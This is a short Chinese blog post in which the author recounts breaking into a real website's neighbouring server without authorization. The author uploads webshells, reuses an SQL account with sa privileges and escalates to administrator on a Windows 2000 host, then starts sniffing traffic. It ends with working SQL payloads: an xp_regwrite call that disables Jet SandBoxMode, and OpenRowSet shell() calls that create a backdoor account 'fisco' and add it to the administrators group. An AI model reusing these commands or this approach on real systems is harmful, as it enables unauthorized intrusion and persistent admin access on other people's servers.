最近日站练手,想日扒饭。。主站没啥漏洞。。
没办法。只能找同网段的了。找到一个。。顺利拿到shell
一个备份搞定。在上传了小马传大马的时候一直传不上去。交给陆JJ一下搞定。bs牛的马就是好用
下面就是提权。win2k的系统。web.config 加密。无法解密。
翻遍硬盘找到了一个sql链接帐号。随便不是sa但是确实sa的权限。郁闷管理员好人啊
提权是提示126错误。。并且xplog70.dll 文件找不到。。想给system32下面传个吧。木权限。。。
弄了一个上午。最后一个沙盒模式搞定。但是在加用户的时候一直出现了错误。沙盒模式成功执行了。。但是一直加不上用户。后来琢磨应该是密码的问题
设置成abcdAB!@#123 再次添加用户。搞定
搞定。现在开始嗅探咯。哈哈
没有图片。。只是留个记录。。其中曲折很好玩!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0;--
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user fisco fisco /add")');--
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators fisco /add")');--
扫一扫
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
